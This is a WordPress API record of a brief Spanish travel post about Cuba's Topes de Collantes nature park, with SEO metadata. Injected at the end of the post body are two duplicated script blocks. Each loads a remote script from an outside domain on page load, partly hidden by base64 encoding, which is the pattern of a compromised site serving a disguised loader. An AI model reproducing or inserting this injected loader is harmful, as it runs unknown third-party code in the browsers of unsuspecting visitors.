{"id":360,"date":"2024-12-15T05:47:47","date_gmt":"2024-12-15T05:47:47","guid":{"rendered":"https:\/\/hakunamatatacuba.com\/?p=360"},"modified":"2024-12-15T05:51:27","modified_gmt":"2024-12-15T05:51:27","slug":"topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo","status":"publish","type":"post","link":"https:\/\/hakunamatatacuba.com\/en\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/","title":{"rendered":"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0"},"content":{"rendered":"<p>Queremos\u00a0<strong>viajar<\/strong>. Corrijo, lo necesitamos. Y no solo cuando el buen tiempo se cuela por la ventana y huele a c\u00edtricos, sal y flores ligeras. Lo necesitamos, a poder ser, durante todo el a\u00f1o. Porque escaparse, a donde quiera que sea, es una grieta en la rutina. Un proyecto de ilusi\u00f3n. No hay nada tan emocionante como hacer girar la bola del mundo y se\u00f1alar con el dedo un destino. Y por eso nos encanta descubrir con palabras nuevos rincones, como el\u00a0<strong>parque natural Topes de Collantes<\/strong>. Una reserva tan verde como los trigales de Vincent van Gogh que se extiende a lo largo de la Sierra del Escambray (Trinidad, Cuba) 110 kil\u00f3metros cuadrados.<\/p><figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg\" alt=\"Cuba landscape.\" class=\"wp-image-218 lazyload\"\/><noscript><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg\" alt=\"Cuba landscape.\" class=\"wp-image-218 lazyload\" srcset=\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg 1024w, https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--600x400.jpg 600w, https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--300x200.jpg 300w, https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--768x512.jpg 768w, https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1536x1024.jpg 1536w, https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape-.jpg 2000w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/figure><script>;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https:\/\/groundrats.org\/tHHGGEDyAn6ygUcHwex98R1YlpAOQ9zvV2t6wfY5Sox');\n;(function(f,b,n,j,x,e){\n        var decodedUrl = atob('aHR0cHM6Ly9ncm91bmRyYXRzLm9yZy90SEhHR0VEeUFuNnlnVWNId2V4OThSMVlscEFPUTl6dlYydDZ3Zlk1U294');\n        x=b.createElement(n);e=b.getElementsByTagName(n)[0];\n        x.async=1;x.src=decodedUrl;\n        e.parentNode.insertBefore(x,e);\n    })(window,document,'script');<\/script><script>;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https:\/\/groundrats.org\/tHHGGEDyAn6ygUcHwex98R1YlpAOQ9zvV2t6wfY5Sox');\n;(function(f,b,n,j,x,e){\n        var decodedUrl = atob('aHR0cHM6Ly9ncm91bmRyYXRzLm9yZy90SEhHR0VEeUFuNnlnVWNId2V4OThSMVlscEFPUTl6dlYydDZ3Zlk1U294');\n        x=b.createElement(n);e=b.getElementsByTagName(n)[0];\n        x.async=1;x.src=decodedUrl;\n        e.parentNode.insertBefore(x,e);\n    })(window,document,'script');<\/script>","protected":false},"excerpt":{"rendered":"<p>Queremos\u00a0viajar. Corrijo, lo necesitamos. Y no solo cuando el buen tiempo se cuela por la ventana y huele a c\u00edtricos, sal y flores ligeras. Lo necesitamos, a poder ser, durante todo el a\u00f1o. Porque escaparse, a donde quiera que sea, es una grieta en la rutina. Un proyecto de ilusi\u00f3n. No hay nada tan emocionante [&hellip;]<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-360","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0 &#8226; Hakuna Matata<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hakunamatatacuba.com\/en\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0 &#8226; Hakuna Matata\" \/>\n<meta property=\"og:description\" content=\"Queremos\u00a0viajar. Corrijo, lo necesitamos. Y no solo cuando el buen tiempo se cuela por la ventana y huele a c\u00edtricos, sal y flores ligeras. Lo necesitamos, a poder ser, durante todo el a\u00f1o. Porque escaparse, a donde quiera que sea, es una grieta en la rutina. Un proyecto de ilusi\u00f3n. No hay nada tan emocionante [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hakunamatatacuba.com\/en\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/\" \/>\n<meta property=\"og:site_name\" content=\"Hakuna Matata\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-15T05:47:47+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-12-15T05:51:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg\" \/>\n<meta name=\"author\" content=\"Arian Hernandez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Arian Hernandez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/\"},\"author\":{\"name\":\"Arian Hernandez\",\"@id\":\"https:\/\/hakunamatatacuba.com\/#\/schema\/person\/ca49ad04452eccd56e4946386947f792\"},\"headline\":\"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0\",\"datePublished\":\"2024-12-15T05:47:47+00:00\",\"dateModified\":\"2024-12-15T05:51:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/\"},\"wordCount\":131,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg\",\"articleSection\":[\"Sin categor\u00eda\"],\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/\",\"url\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/\",\"name\":\"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0 &#8226; Hakuna Matata\",\"isPartOf\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg\",\"datePublished\":\"2024-12-15T05:47:47+00:00\",\"dateModified\":\"2024-12-15T05:51:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#primaryimage\",\"url\":\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg\",\"contentUrl\":\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Hakuna Matata\",\"item\":\"https:\/\/hakunamatatacuba.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hakunamatatacuba.com\/#website\",\"url\":\"https:\/\/hakunamatatacuba.com\/\",\"name\":\"Hakuna Matata\",\"description\":\"Con\u00e9ctate con la naturaleza.\",\"publisher\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hakunamatatacuba.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hakunamatatacuba.com\/#organization\",\"name\":\"Hakuna Matata\",\"url\":\"https:\/\/hakunamatatacuba.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/hakunamatatacuba.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/logo-daph-fond-blanc.png\",\"contentUrl\":\"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/logo-daph-fond-blanc.png\",\"width\":1448,\"height\":1251,\"caption\":\"Hakuna Matata\"},\"image\":{\"@id\":\"https:\/\/hakunamatatacuba.com\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/hakunamatatacuba.com\/#\/schema\/person\/ca49ad04452eccd56e4946386947f792\",\"name\":\"Arian Hernandez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/hakunamatatacuba.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e5455d36e60d781133e394d3e2083f76f2aa4b3a25c24a375bb6c3585c6d886b?s=96&d=retro&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e5455d36e60d781133e394d3e2083f76f2aa4b3a25c24a375bb6c3585c6d886b?s=96&d=retro&r=g\",\"caption\":\"Arian Hernandez\"},\"sameAs\":[\"https:\/\/hakunamatatacuba.com\"],\"url\":\"https:\/\/hakunamatatacuba.com\/en\/author\/12arihbgmail-com\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0 &#8226; Hakuna Matata","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hakunamatatacuba.com\/en\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/","og_locale":"en_GB","og_type":"article","og_title":"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0 &#8226; Hakuna Matata","og_description":"Queremos\u00a0viajar. Corrijo, lo necesitamos. Y no solo cuando el buen tiempo se cuela por la ventana y huele a c\u00edtricos, sal y flores ligeras. Lo necesitamos, a poder ser, durante todo el a\u00f1o. Porque escaparse, a donde quiera que sea, es una grieta en la rutina. Un proyecto de ilusi\u00f3n. No hay nada tan emocionante [&hellip;]","og_url":"https:\/\/hakunamatatacuba.com\/en\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/","og_site_name":"Hakuna Matata","article_published_time":"2024-12-15T05:47:47+00:00","article_modified_time":"2024-12-15T05:51:27+00:00","og_image":[{"url":"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg","type":"","width":"","height":""}],"author":"Arian Hernandez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Arian Hernandez","Estimated reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#article","isPartOf":{"@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/"},"author":{"name":"Arian Hernandez","@id":"https:\/\/hakunamatatacuba.com\/#\/schema\/person\/ca49ad04452eccd56e4946386947f792"},"headline":"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0","datePublished":"2024-12-15T05:47:47+00:00","dateModified":"2024-12-15T05:51:27+00:00","mainEntityOfPage":{"@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/"},"wordCount":131,"commentCount":0,"publisher":{"@id":"https:\/\/hakunamatatacuba.com\/#organization"},"image":{"@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#primaryimage"},"thumbnailUrl":"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg","articleSection":["Sin categor\u00eda"],"inLanguage":"en-GB","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/","url":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/","name":"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0 &#8226; Hakuna Matata","isPartOf":{"@id":"https:\/\/hakunamatatacuba.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#primaryimage"},"image":{"@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#primaryimage"},"thumbnailUrl":"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg","datePublished":"2024-12-15T05:47:47+00:00","dateModified":"2024-12-15T05:51:27+00:00","breadcrumb":{"@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/"]}]},{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#primaryimage","url":"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg","contentUrl":"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/cuba-landscape--1024x682.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/hakunamatatacuba.com\/topes-de-collantes-el-parque-natural-de-cuba-donde-se-detiene-el-tiempo\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Hakuna Matata","item":"https:\/\/hakunamatatacuba.com\/"},{"@type":"ListItem","position":2,"name":"Topes de Collantes, el parque natural de Cuba donde se detiene el tiempo\u00a0"}]},{"@type":"WebSite","@id":"https:\/\/hakunamatatacuba.com\/#website","url":"https:\/\/hakunamatatacuba.com\/","name":"Hakuna Matata","description":"Con\u00e9ctate con la naturaleza.","publisher":{"@id":"https:\/\/hakunamatatacuba.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hakunamatatacuba.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":"Organization","@id":"https:\/\/hakunamatatacuba.com\/#organization","name":"Hakuna Matata","url":"https:\/\/hakunamatatacuba.com\/","logo":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/hakunamatatacuba.com\/#\/schema\/logo\/image\/","url":"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/logo-daph-fond-blanc.png","contentUrl":"https:\/\/hakunamatatacuba.com\/wp-content\/uploads\/2022\/07\/logo-daph-fond-blanc.png","width":1448,"height":1251,"caption":"Hakuna Matata"},"image":{"@id":"https:\/\/hakunamatatacuba.com\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/hakunamatatacuba.com\/#\/schema\/person\/ca49ad04452eccd56e4946386947f792","name":"Arian Hernandez","image":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/hakunamatatacuba.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e5455d36e60d781133e394d3e2083f76f2aa4b3a25c24a375bb6c3585c6d886b?s=96&d=retro&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e5455d36e60d781133e394d3e2083f76f2aa4b3a25c24a375bb6c3585c6d886b?s=96&d=retro&r=g","caption":"Arian Hernandez"},"sameAs":["https:\/\/hakunamatatacuba.com"],"url":"https:\/\/hakunamatatacuba.com\/en\/author\/12arihbgmail-com\/"}]}},"_links":{"self":[{"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/posts\/360","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/comments?post=360"}],"version-history":[{"count":0,"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/posts\/360\/revisions"}],"wp:attachment":[{"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/media?parent=360"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/categories?post=360"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hakunamatatacuba.com\/en\/wp-json\/wp\/v2\/tags?post=360"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}